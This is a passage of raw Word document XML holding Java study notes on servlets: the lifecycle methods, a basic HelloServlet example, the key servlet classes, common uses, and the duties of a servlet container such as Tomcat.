        <w:t xml:space="preserve"> between client requests (usually from a web browser) and server-side resources (like databases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC5529" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002704B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6D1D9BC">
          <v:rect id="_x0000_i1905" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBBD519" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B6">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ervlet Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEAD356" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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itialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (init())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA4702" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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lled once when the servlet is first loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42FD7C" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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quest Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (service())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240324C9" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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lled every time the servlet receives a request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A70957" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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legates to doGet(), doPost(), etc., based on HTTP method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E0BAC" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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struction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (destroy())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B2A0BF" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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lled once when the servlet is being taken out of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCDA25D" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002704B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B9AD9F0">
          <v:rect id="_x0000_i1906" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAC80B" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B6">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Basic Servlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D8197" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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8794216"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@WebServle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ello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00114B7C" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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879421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elloServle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xtend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ttpServle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2898E6B" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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87942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otecte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doGe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HttpServletRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reque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ttpServletResponse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> response</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62296574" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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87942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row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rvletExcep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OExcepti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925FEA9" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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8794216"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        respons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etContentTyp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text/html"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A78C55" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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87942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rintWrit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ou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espons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Writer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF8B25" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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87942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prin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lt;h1&gt;Hello from Servlet&lt;/h1&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649E46F" w14:textId="77777777" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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87942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9A6C531" w14:textId="6DFE970D" w:rsidR="002704B6" w:rsidRPr="00CE4B95" w:rsidRDefault="002704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8794216"/>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6C656A1A" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002704B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A7A174">
          <v:rect id="_x0000_i1907" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A455E5" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B6">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Classes &amp; Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FDBC8" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ttpServlet – abstract class for HTTP-specific requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F33DD" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ttpServletRequest – provides request info (parameters, headers, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C158591" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ttpServletResponse – used to write response back to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B200A3" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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rvletConfig, ServletContext – provide config and context information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF5BE3" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002704B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FE9D41A">
          <v:rect id="_x0000_i1908" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904D1CE" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B6">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Uses of Servlets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1AA79" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ocessing form data (login, registration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A25A73E" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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enerating dynamic web content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DD3B5" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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cting as a controller in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern (e.g., in Spring MVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFACF4" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002704B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7AD80B">
          <v:rect id="_x0000_i1909" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="339B038E" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B6">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ervlet Container (like Tomcat) Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE41C2D" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ading the servlet class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619D007" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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naging the servlet lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E62AE" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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pping URLs to servlet classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C6149" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ndling HTTP requests/responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D1094" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A9612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BBED55F">
          <v:rect id="_x0000_i1910" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95ADAB" w14:textId="674F2E67" w:rsidR="00FF12B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF12B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="_Toc196307868"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain servlet lifecycle?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>
    </w:p>
    <w:p w14:paraId="2EF27075" w14:textId="0A079B9E" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> goes through </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5 stages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in its lifecycle, managed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Servlet Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Tomcat). These stages are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D0F6FF" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="34070C59">
          <v:rect id="_x0000_i1911" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA05AD8" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Loading and Instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9F1E1" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1750"/>
        </w:num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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Servlet container loads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the servlet class when it receives the first request (or on startup if configured).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450FD4E" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1750"/>
        </w:num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 xml:space="preserve">Then it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>creates an instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the servlet using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no-arg constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62129EDB" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="0D718A9A">
          <v:rect id="_x0000_i1912" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F652BC5" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. Initialization (init() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D1A34" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1751"/>
        </w:num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lastRenderedPageBreak/>
        <w:t xml:space="preserve">After instantiation, the container calls the init(ServletConfig config) method </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F31DA0" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1751"/>
        </w:num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 xml:space="preserve">Used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>initialize resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> like DB connections, file reading, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C449B4" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1751"/>
        </w:num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You can override this method in your servlet class.</w:t>
      </w:r>
    </w:p>
